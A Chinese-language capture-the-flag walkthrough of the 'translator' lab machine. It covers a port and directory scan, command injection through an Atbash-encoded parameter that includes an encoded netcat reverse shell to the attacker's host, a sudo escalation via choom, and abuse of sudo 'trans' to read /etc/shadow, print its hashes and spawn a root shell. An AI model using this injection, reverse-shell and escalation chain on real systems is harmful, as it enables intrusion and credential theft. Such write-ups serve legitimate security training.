【OSCP】translator

admin
admin
admin
138858
文章
114
评论
2024年6月7日08:09:58评论8 views字数 3118阅读10分23秒阅读模式
【OSCP】translator

OSCP 靶场

【OSCP】translator

靶场介绍

translator

easy

命令执行、sudo提权、trans 提权

信息收集

主机发现

【OSCP】translator

端口扫描

└─# nmap -sV -A -p- -T4 192.168.31.238
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-14 07:19 EST
Nmap scan report for 192.168.31.238
Host is up (0.0014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 08:cf:50:b2:4f:41:43:c4:66:56:ce:96:b9:04:8c:77 (RSA)
|   256 40:b7:11:24:76:59:cd:e0:79:db:71:d1:39:29:d5:45 (ECDSA)
|_  256 44:64:ba:b8:52:4f:ca:00:dd:3e:c3:28:71:6f:77:76 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:E5:34:AB (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.39 ms 192.168.31.238

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.81 seconds

【OSCP】translator

目录扫描

└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt      -u http://192.168.31.238 -x html,php,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.31.238
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,php,txt
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.31.238/index.html           (Status: 200) [Size: 290]
http://192.168.31.238/translate.php        (Status: 200) [Size: 20]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished

权限获取

这里发现使用转换后的字符串后输出结果,说明存在命令执行

【OSCP】translator

【OSCP】translator

通过https://www.dcode.fr/cipher-identifier 发现是使用atbash编码

【OSCP】translator

/translate.php?hmv=id;cat+translate.php
/translate.php?hmv=id;xzg gizmhozgv.ksk

【OSCP】translator

http://192.168.31.238/translate.php?hmv=id;mx%20-x%20/yrm/yzhs%20192.168.31.181%208888

【OSCP】translator

【OSCP】translator

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+z快捷键
stty -a
stty raw -echo;fg
reset

【OSCP】translator

权限提升

【OSCP】translator

根目录下发现一串字符串,解密后是密码

【OSCP】translator

利用sudo 提权到india 账号

https://gtfobins.github.io/gtfobins/choom/

【OSCP】translator

【OSCP】translator

利用trans 进行提权,命令介绍:https://www.jianshu.com/p/da570df21ae8

【OSCP】translator

这个是google的shell下翻译工具,所以google需要科学上网,我们在后面加上了-x代理,成功读取到shadow文件

sudo /usr/local/bin/trans -i /etc/shadow -x http://192.168.31.11:7890 -no-auto
sudo /usr/local/bin/trans -i /root/root.txt -x http://192.168.31.11:7890 -no-auto

【OSCP】translator

┌──(root㉿kali)-[~]
└─# cat shadow
root:$y$j9T$0joZ0oj3e80LfnTHpkekz.$4kPdxlVJVQ/dfaEAR8qAOVlqivUAg2kQmXvsrXOMsMD:19123:0:99999:7:::
india:$y$j9T$uh47pVJ1gtUpSE0fnbOZL1$iXJzdmDEqRk5G.7finhLe.0ZibKHoLCu.EDwdUguKl4:19123:0:99999:7:::

读取后使用john 进行爆破,但是没有爆破出来。

john shadow --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt

【OSCP】translator

我们也可以直接读取root.txt flag

【OSCP】translator

也可以通过如下命令直接提权到root

sudo /usr/local/bin/trans -pager less -x http://192.168.31.11:7890

【OSCP】translator

End

“点赞、在看与分享都是莫大的支持”

【OSCP】translator

【OSCP】translator

原文始发于微信公众号(贝雷帽SEC):【OSCP】translator

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月7日08:09:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【OSCP】translatorhttps://cn-sec.com/archives/2817948.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息